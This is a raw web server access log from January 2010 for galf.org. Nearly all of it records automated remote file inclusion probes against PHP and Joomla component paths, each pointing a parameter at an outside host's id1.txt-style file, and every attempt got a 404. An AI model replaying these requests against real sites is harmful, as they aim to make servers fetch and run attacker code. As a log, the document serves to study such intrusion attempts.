72.55.143.249 - - [04/Jan/2010:07:30:21 -0800] "GET /logs/access_091228.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:30:35 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:30:35 -0800] "GET /logs/access_091228.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:30:35 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:38 -0800] "GET /logs/access_091221.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:38 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:38 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:39 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:39 -0800] "GET /logs/access_091221.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:39 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:46 -0800] "GET /logs/access_091221.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:46 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:46 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:46 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:46 -0800] "GET /logs/access_091221.log//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:31:46 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:49 -0800] "GET /logs/access_091221.log//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:49 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:49 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:52 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:52 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:52 -0800] "GET /logs/access_091221.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:52 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:52 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:52 -0800] "GET /logs/access_091221.log%20%20//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:54 -0800] "GET /logs//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:54 -0800] "GET /logs/access_091221.log//toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:31:54 -0800] "GET /toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:33:32 -0800] "GET /logs/access_091221.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:33:32 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:33:32 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:33:38 -0800] "GET /logs/access_091221.log//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:33:38 -0800] "GET /errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:33:38 -0800] "GET /logs//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:33:39 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:33:39 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:33:39 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.190.166.35 - - [04/Jan/2010:07:33:47 -0800] "GET /logs/access_090817.log//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:33:47 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:33:47 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:33:47 -0800] "GET /logs/access_090817.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:33:49 -0800] "GET /logs/access_090817.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:34:04 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:34:04 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:34:04 -0800] "GET /logs/access_091221.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:34:43 -0800] "GET /logs/access_090817.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:34:45 -0800] "GET /logs//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:34:45 -0800] "GET /errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:34:46 -0800] "GET /logs/access_090817.log%20%20//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:35:08 -0800] "GET /logs/access_090817.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:35:13 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:35:13 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:35:22 -0800] "GET /errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:35:22 -0800] "GET /logs//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:35:24 -0800] "GET /errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:35:24 -0800] "GET /logs//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:35:26 -0800] "GET /logs/access_091221.log//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:35:33 -0800] "GET /logs/access_090817.log//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:35:34 -0800] "GET /logs/access_090817.log//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:35:40 -0800] "GET /logs//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.146.200 - - [04/Jan/2010:07:35:41 -0800] "GET /logs/access_091123.log%20%20//errors.php?error=http://www.sharingpath.org/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:35:45 -0800] "GET /errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:35:50 -0800] "GET /logs/access_091221.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:36:00 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:36:00 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:36:00 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:36:07 -0800] "GET /logs/access_090817.log//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:36:08 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:36:08 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:36:08 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [04/Jan/2010:07:36:24 -0800] "GET /logs/access_090914.log HTTP/1.0" 200 6411322 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
62.149.240.214 - - [04/Jan/2010:07:36:53 -0800] "GET /logs/access_091228.log%20//errors.php?error=http://www.webhosting.gr/webstats_delete/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:15 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:15 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:16 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:19 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:19 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:19 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:33 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:33 -0800] "GET /logs/access_091228.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:37:33 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [04/Jan/2010:07:37:58 -0800] "GET /logs/access_091123.log%20%20//errors.php?error=http://www.saskatoonhomepage.ca/components/com_rssfactory/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:38:33 -0800] "GET /logs/access_091228.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:38:33 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:38:33 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:38:34 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:38:34 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:38:34 -0800] "GET /logs/access_091228.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:39:12 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.148.238.69 - - [04/Jan/2010:07:39:30 -0800] "GET /logs/access_091123.log%20%20//errors.php?error=http://militarytattoo.lu/adminv3/files/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:07:40:22 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:40:22 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:07:40:22 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.9561212.ru/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [04/Jan/2010:07:40:57 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:40:59 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:43:02 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [04/Jan/2010:07:43:02 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [04/Jan/2010:07:43:02 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [04/Jan/2010:07:43:02 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [04/Jan/2010:07:43:02 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [04/Jan/2010:07:43:02 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.151.114.34 - - [04/Jan/2010:07:44:51 -0800] "GET /logs/access_091026.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.pyrenees-ho.com//assets/drgalleries/53/oryid.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.151.114.34 - - [04/Jan/2010:07:44:51 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.pyrenees-ho.com//assets/drgalleries/53/oryid.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
89.151.114.34 - - [04/Jan/2010:07:44:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.pyrenees-ho.com//assets/drgalleries/53/oryid.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:07:47:35 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [04/Jan/2010:07:47:36 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.17 - - [04/Jan/2010:07:48:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [04/Jan/2010:07:48:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [04/Jan/2010:07:48:03 -0800] "GET /logs/access_090921.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [04/Jan/2010:07:55:40 -0800] "GET /logs/access_090921.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [04/Jan/2010:07:55:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [04/Jan/2010:07:55:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:56:46 -0800] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:56:58 -0800] "GET /logs/access_091214.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.230.148.68 - - [04/Jan/2010:07:56:58 -0800] "GET /logs/access_090921.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
